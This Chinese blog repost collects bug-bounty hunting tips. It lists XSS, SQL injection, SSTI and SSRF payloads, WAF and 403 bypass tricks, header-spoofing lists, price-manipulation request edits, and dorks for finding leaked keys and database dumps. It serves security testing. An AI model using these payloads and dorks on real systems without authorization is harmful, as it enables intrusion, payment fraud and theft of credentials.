赏金漏洞挖掘的几个技巧

  • A+
所属分类:安全文章

From:https://www.infosecmatter.com/bug-bounty-tips/

感觉老外挖赏金的还挺多,没事就秀一下赏了多少钱,有人做了一系列的挖赏金的技巧,都是从推上找的,我转过来给大家,有涨姿势甚好。

前面一些我之前发过了,没看过的可以看看,后面的是最近新加的。

不知道各位小伙伴还有在挖src的吗?

查询是否存在heart bleed漏洞

cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done

赏金漏洞挖掘的几个技巧

使用grep去除垃圾数据

curl http://host.xx/file.js | grep -Eo"(http|https)://[a-zA-Z0-9./?=_-]*"*cat file | grep -Eo"(http|https)://[a-zA-Z0-9./?=_-]*"*

赏金漏洞挖掘的几个技巧

从APK中获得敏感数据

先使用apktool解包

apktool d app_name.apk
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insertinto" APKfolder/

远程解压文件

pip install remotezip

#列出远程压缩包文件内容
remotezip -l http://site/bigfile.zip

#解压里面的文件
remotezip "http://site/bigfile.zip" "file.txt"

Top25 ssrf dorks

赏金漏洞挖掘的几个技巧

Top25重定向dorks

赏金漏洞挖掘的几个技巧

使用SecurityTrails API查询子域名

去https://securitytrails.com/申请个免费的API

curl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY |jq '.subdomains[]' | sed 's/"//g' >test.txt 2>/dev/null &&sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.txt

赏金漏洞挖掘的几个技巧

邮件地址payload

XSS

test+(<script>alert(0)</script>)@example.com
[email protected](<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com

SSTI

"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com

SQL injection

"' OR 1=1 -- '"@example.com

"mail'); --"@example.com

SSRF

[email protected]
[email protected][127.0.0.1]

数据库文件

/back.sql

/backup.sql

/accounts.sql

/backups.sql

/clients.sql

/customers.sql

/data.sql

/database.sql

/database.sqlite

/users.sql

/db.sql

/db.sqlite

/db_backup.sql

/dbase.sql

/dbdump.sql

setup.sql

sqldump.sql

/dump.sql

/mysql.sql

/sql.sql

/temp.sql

在Drupal上找到隐藏的页面

https://target.com/node/1

https://target.com/node/2

https://target.com/node/3

https://target.com/node/499

https://target.com/node/500

Google dorks

inurl:example.comintitle:"index of"

inurl:example.comintitle:"index of /" "*key.pem"

inurl:example.com ext:log

inurl:example.comintitle:"index of" ext:sql|xls|xml|json|csv

inurl:example.com"MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git

使用Shodan查找RocketMQ控制台

org:target.comhttp.title:rocketmq-console

赏金漏洞挖掘的几个技巧

使用Shodan查找Spring Boot服务器

org:YOUR_TARGEThttp.favicon.hash:116323821

如果/env可用,则可能可以实现RCE。如果可以访问/ heapdump,则可能会找到私钥和令牌。

赏金漏洞挖掘的几个技巧

HTTP Accept头修改

通过更改Accept标头来发现某些Web服务器中的信息泄露:

Accept: application/json,text/javascript, */*; q=0.01


一些易受攻击的Web服务器可能会泄露服务器版本信息,路由信息。

通过网站图标ico哈希查找相关域

https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py

赏金漏洞挖掘的几个技巧

SSRF payload绕过WAF

1)使用CIDR绕过SSRF:

http://127.127.127.127

http://127.0.0.0

2)使用稀有地址绕过:

http://127.1

http://0

3)使用技巧组合绕过:

http://1.1.1.1 &@2.2.2.2#@3.3.3.3/

urllib : 3.3.3.3

4)绕过弱解析器:

http://127.1.1.1:[email protected]:80/

5)用[::]绕过localhost:

http://[::]:80/

http://0000::1:80/

目录浏览

当你获得个目录浏览的时候

赏金漏洞挖掘的几个技巧

wget -r --no-parent target.com/dir

使用此命令将文件和目录结构下载回来

价格操纵

如果无法更改产品价格参数,请更改产品数量:

items[1][数量] = 1 –> 234 RMB

items[1][数量] = 0.1 –> 23.4 RMB

 

将2个产品添加到购物篮中-假设一个产品是40美元

如果以这种方式处理请求:
{"items":{"laptop":1," mobile":1}}

将JSON正文更改为:
{"items":{"laptop":4," mobile":-2}}

两件商品的费用将变为$ 20:
4 * $ 40 – 2 * $ 70 = $ 160 – $ 140 = $ 20

选择要购买的任何物品

选择一种支付方式作为付款方式,拦截所有请求

直到从支付方式获得名为“金额”的参数

价格操纵并将其更改为0.01 $

付款,等待确认

使用gau和httpx查找javascript文件

需安装以下2个工具

https://github.com/projectdiscovery/httpx

https://github.com/lc/gau

echo target.com | gau | grep'.js$' | httpx -status-code -mc 200 -content-type | grep'application/javascript'

赏金漏洞挖掘的几个技巧

从JS文件中提取API

cat file.js | grep -aoP"(?<=("|'|`))/[a-zA-Z0-9_?&=/-#.]*(?=("|'|`))"| sort -u

赏金漏洞挖掘的几个技巧

通过篡改URI访问管理面板/绕过403

https://target.com/admin/ –>HTTP 302(重定向到登录页面)

https://target.com/admin..;/–> HTTP 200 OK

https://target.com/../admin

https://target.com/whatever/..;/admin

site.com/secret –> HTTP 403

site.com/secret/-> HTTP 200OK

site.com/secret/。–> HTTP 200确定

site.com//secret//-> HTTP200 OK

site.com/./secret/ .. –>HTTP 200 OK

在SVN中查找数据库信息

https://github.com/anantshri/svn-extractor

./svn-extractor.py--url http://url.com --matchdatabase.php

赏金漏洞挖掘的几个技巧

直接从APK中获取信息

https://github.com/ndelphit/apkurlgrep

apkurlgrep -a /path/to/file.apk

Result of URLs:

 

https://example.com

https://example.net

https://example.edu

 

Result of URLs Paths:

 

/example

/admin

/onboarding

在JS文件中查找隐藏的GET参数

搜寻JS中的变量名称,例如:
var test = "xxx"

尝试将每个参数作为GET参数来发现隐藏的参数,例如:
https://example.com/?test="xsstest

这通常会导致XSS

assetfinder example.com | gau |egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; dovars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed's/.*/&=xss/g'); echo -e "e[1;33m$urlne[1;32m$vars"; done

赏金漏洞挖掘的几个技巧

GitHub dorks查找敏感信息

extension:pem private

extension:ppk private

extension:sql mysql dump password

extension:json api.forecast.io

extension:json mongolab.com

extension:yaml mongolab.com

extension:ica [WFClient] Password=

extension:avastlic "support.avast.com"

extension:js jsforce conn.login

extension:json googleusercontentclient_secret

赏金漏洞挖掘的几个技巧

https://github.com/techgaun/github-dorks

通过添加X- HTTP头绕过限制

X-Originating-IP: IP

X-Forwarded-For: IP

X-Remote-IP: IP

X-Remote-Addr: IP

X-Client-IP: IP

X-Host: IP

X-Forwared-Host: IP

尝试以下IP

192.168.0.0/16

172.16.0.0/12

127.0.0.0/8

10.0.0.0/8

Firebird数据库注入不出数据

python sqlmap.py -r req -p vuln --level 3--risk 3 --thread 8 --dbms Firebird --tables

赏金漏洞挖掘的几个技巧

赏金漏洞挖掘的几个技巧

上传利用

当你获得个上传点的时候,上传不同后缀文件可以获得什么

Asp/aspx/php/jsp  -> webshell/rce

Svg -> ssrf/xxe/xss

Gif-> xss

Csv->csv注入

Xml->xxe

Avi->LFI/SSRF

HTML/js->xss/重定向

Zip->rce/lfi

Pdf/pptx->ssrf/xxe

api接口

获取到一个api的时候,如:

/api/getUser

可以对后面的参数fuzz,如:

/api/getUser$FUZZ$

赏金漏洞挖掘的几个技巧

基于cookie的php文件包含

赏金漏洞挖掘的几个技巧

尝试改变它

lang=langPack/blabla

赏金漏洞挖掘的几个技巧

赏金漏洞挖掘的几个技巧

赏金漏洞挖掘的几个技巧

赏金漏洞挖掘的几个技巧


本文始发于微信公众号(关注安全技术):赏金漏洞挖掘的几个技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: